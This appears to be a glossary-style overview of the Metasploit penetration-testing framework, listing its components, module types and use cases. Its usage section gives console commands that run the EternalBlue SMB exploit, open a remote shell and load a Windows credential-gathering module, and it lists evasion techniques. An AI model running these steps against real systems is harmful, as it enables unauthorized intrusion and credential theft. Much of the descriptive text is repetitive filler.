Metasploit is an exploitation framework that provides tools for penetration testing and exploit development.

What is Metasploit?

Metasploit is an open-source framework that provides tools for penetration testing, exploit development and security research.

Components

Framework Core

• Exploits: Exploitation modules
• Payloads: Payloads
• Auxiliaries: Auxiliary modules
• Encoders: Encoders

Metasploit Pro

• Web interface: Advanced web interface
• Automation: Task automation
• Reports: Advanced reports
• Integration: Integration with other tools

Metasploit Community

• Free version: Free version
• Basic features: Basic features
• Community: Community support
• Documentation: Complete documentation

Features

Exploitation

• Exploits: Vulnerability exploitation
• Payloads: Payloads
• Post-exploitation: Post-exploitation
• Pivoting: Network pivoting

Development

• Exploit development: Exploit creation
• Payload development: Payload creation
• Testing: Exploit testing
• Debugging: Code debugging

Automation

• Scripts: Automation scripts
• Workflows: Workflows
• Batch processing: Batch processing
• Scheduling: Task scheduling

Basic Usage

Starting Metasploit

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# Start Metasploit
msfconsole

# View available commands
help

# Search exploits
search exploit

# Search payloads
search payload

Exploitation

1
2
3
4
5
6
7
8
9

# Select exploit
use exploit/windows/smb/ms17_010_eternalblue

# Configure options
set RHOSTS 192.168.1.100
set LHOST 192.168.1.1

# Execute exploit
exploit

Post-exploitation

1
2
3
4
5
6
7
8

# View system information
sysinfo

# Get shell
shell

# Load post-exploitation modules
load post/windows/gather/credentials

Modules

Exploits

• Windows: Windows exploits
• Linux: Linux exploits
• Web: Web application exploits
• Mobile: Mobile device exploits

Payloads

• Shell: Command shells
• Meterpreter: Advanced payload
• Bind: Bind payloads
• Reverse: Reverse payloads

Auxiliaries

• Scanners: Network scanners
• Fuzzers: Application fuzzers
• Spoofers: Spoofers
• Sniffers: Traffic capturers

Use Cases

Penetration Testing

• Reconnaissance: Reconnaissance phase
• Scanning: Target scanning
• Exploitation: Vulnerability exploitation
• Post-exploitation: Post-exploitation

Red Team

• Simulation: Attack simulation
• Evaluation: Defense evaluation
• Training: Team training
• Research: Security research

Development

• Exploit development: Exploit creation
• Testing: Security testing
• Research: Vulnerability research
• Education: Security education

Best Practices

Ethical Use

• Authorization: Obtain authorization
• Scope: Define testing scope
• Documentation: Document activities
• Responsibility: Assume responsibility

Techniques

• Stealth: Use stealth techniques
• Timing: Adjust attack timing
• Fragmentation: Use fragmentation
• Decoy: Use decoys

Analysis

• Results: Analyze results
• False Positives: Identify false positives
• Correlation: Correlate with other data
• Documentation: Document findings

Related Concepts

• Ethical Hacking - Methodology that uses Metasploit
• Penetration Testing - Technique that uses Metasploit
• Vulnerability Assessment - Assessment that includes Metasploit
• Nmap - Complementary tool to Metasploit
• Nessus - Complementary scanner to Metasploit
• Firewall - Device that Metasploit can test
• VPN - Connection that Metasploit can analyze
• VLAN - Segment that Metasploit can scan
• Routers - Devices that Metasploit identifies
• Switches - Devices that Metasploit scans
• Logs - Metasploit test logs
• Dashboards - Metasploit results visualization

References

• Metasploit Official
• Metasploit Documentation
• Metasploit Unleashed
• Rapid7 Metasploit